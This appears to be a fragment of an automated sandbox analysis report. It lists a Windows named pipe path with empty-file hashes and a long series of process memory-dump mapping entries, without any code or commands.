SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/112-68-0x0000000000000000-mapping.dmp
-
memory/280-66-0x0000000000000000-mapping.dmp
-
memory/336-82-0x0000000000000000-mapping.dmp
-
memory/340-127-0x0000000000000000-mapping.dmp
-
memory/340-114-0x0000000000000000-mapping.dmp
-
memory/380-119-0x0000000000000000-mapping.dmp
-
memory/452-116-0x0000000000000000-mapping.dmp
-
memory/512-63-0x0000000000000000-mapping.dmp
-
memory/512-123-0x0000000000000000-mapping.dmp
-
memory/544-96-0x0000000000000000-mapping.dmp
-
memory/544-104-0x0000000000000000-mapping.dmp
-
memory/548-69-0x0000000000000000-mapping.dmp
-
memory/556-98-0x0000000000000000-mapping.dmp
-
memory/564-99-0x0000000000000000-mapping.dmp
-
memory/572-125-0x0000000000000000-mapping.dmp
-
memory/572-77-0x0000000000000000-mapping.dmp
-
memory/572-80-0x000007FEFC031000-0x000007FEFC033000-memory.dmpFilesize
8KB
-
memory/632-70-0x0000000000000000-mapping.dmp
-
memory/632-126-0x0000000000000000-mapping.dmp
-
memory/732-72-0x0000000000000000-mapping.dmp
-
memory/752-111-0x0000000000000000-mapping.dmp
-
memory/752-76-0x0000000000000000-mapping.dmp
-
memory/764-118-0x0000000000000000-mapping.dmp
-
memory/792-100-0x0000000000000000-mapping.dmp
-
memory/792-115-0x0000000000000000-mapping.dmp
-
memory/820-81-0x0000000000000000-mapping.dmp
-
memory/828-103-0x0000000000000000-mapping.dmp
-
memory/900-93-0x0000000000000000-mapping.dmp
-
memory/960-105-0x0000000000000000-mapping.dmp
-
memory/996-117-0x0000000000000000-mapping.dmp
-
memory/1020-128-0x0000000000000000-mapping.dmp
-
memory/1020-79-0x0000000000000000-mapping.dmp
-
memory/1032-124-0x0000000000000000-mapping.dmp
-
memory/1032-95-0x0000000000000000-mapping.dmp
-
memory/1116-97-0x0000000000000000-mapping.dmp
-
memory/1128-112-0x0000000000000000-mapping.dmp
-
memory/1128-78-0x0000000000000000-mapping.dmp
-
memory/1152-109-0x0000000000000000-mapping.dmp
-
memory/1332-101-0x0000000000000000-mapping.dmp
-
memory/1340-120-0x0000000000000000-mapping.dmp
-
memory/1372-89-0x0000000000000000-mapping.dmp
-
memory/1392-122-0x0000000000000000-mapping.dmp
-
memory/1456-91-0x0000000000000000-mapping.dmp
-
memory/1492-85-0x0000000000000000-mapping.dmp
-
memory/1492-113-0x0000000000000000-mapping.dmp
-
memory/1528-73-0x0000000000000000-mapping.dmp
-
memory/1580-90-0x0000000000000000-mapping.dmp
-
memory/1584-75-0x0000000000000000-mapping.dmp
-
memory/1588-106-0x0000000000000000-mapping.dmp
-
memory/1632-60-0x0000000000AF0000-0x0000000000AF1000-memory.dmpFilesize
4KB
-
memory/1632-62-0x000000001AB80000-0x000000001AB82000-memory.dmpFilesize
8KB
-
memory/1648-88-0x0000000000000000-mapping.dmp
-
memory/1660-83-0x0000000000000000-mapping.dmp
-
memory/1660-102-0x0000000000000000-mapping.dmp
-
memory/1688-87-0x0000000000000000-mapping.dmp
-
memory/1692-121-0x0000000000000000-mapping.dmp
-
memory/1732-64-0x0000000000000000-mapping.dmp
-
memory/1744-74-0x0000000000000000-mapping.dmp
-
memory/1752-108-0x0000000000000000-mapping.dmp
-
memory/1760-107-0x0000000000000000-mapping.dmp
-
memory/1768-65-0x0000000000000000-mapping.dmp
-
memory/1780-110-0x0000000000000000-mapping.dmp
-
memory/1780-71-0x0000000000000000-mapping.dmp
-
memory/1792-84-0x0000000000000000-mapping.dmp
-
memory/1804-86-0x0000000000000000-mapping.dmp
-
memory/1816-67-0x0000000000000000-mapping.dmp
-
memory/1920-92-0x0000000000000000-mapping.dmp
-
memory/2816-160-0x000000001AAB0000-0x000000001AAB1000-memory.dmpFilesize
4KB
-
memory/2816-159-0x0000000001DB0000-0x0000000001DB1000-memory.dmpFilesize
4KB
-
memory/2816-161-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/2816-163-0x000000001AA34000-0x000000001AA36000-memory.dmpFilesize
8KB
-
memory/2816-162-0x000000001AA30000-0x000000001AA32000-memory.dmpFilesize
8KB
-
memory/2816-164-0x00000000022A0000-0x00000000022A1000-memory.dmpFilesize
4KB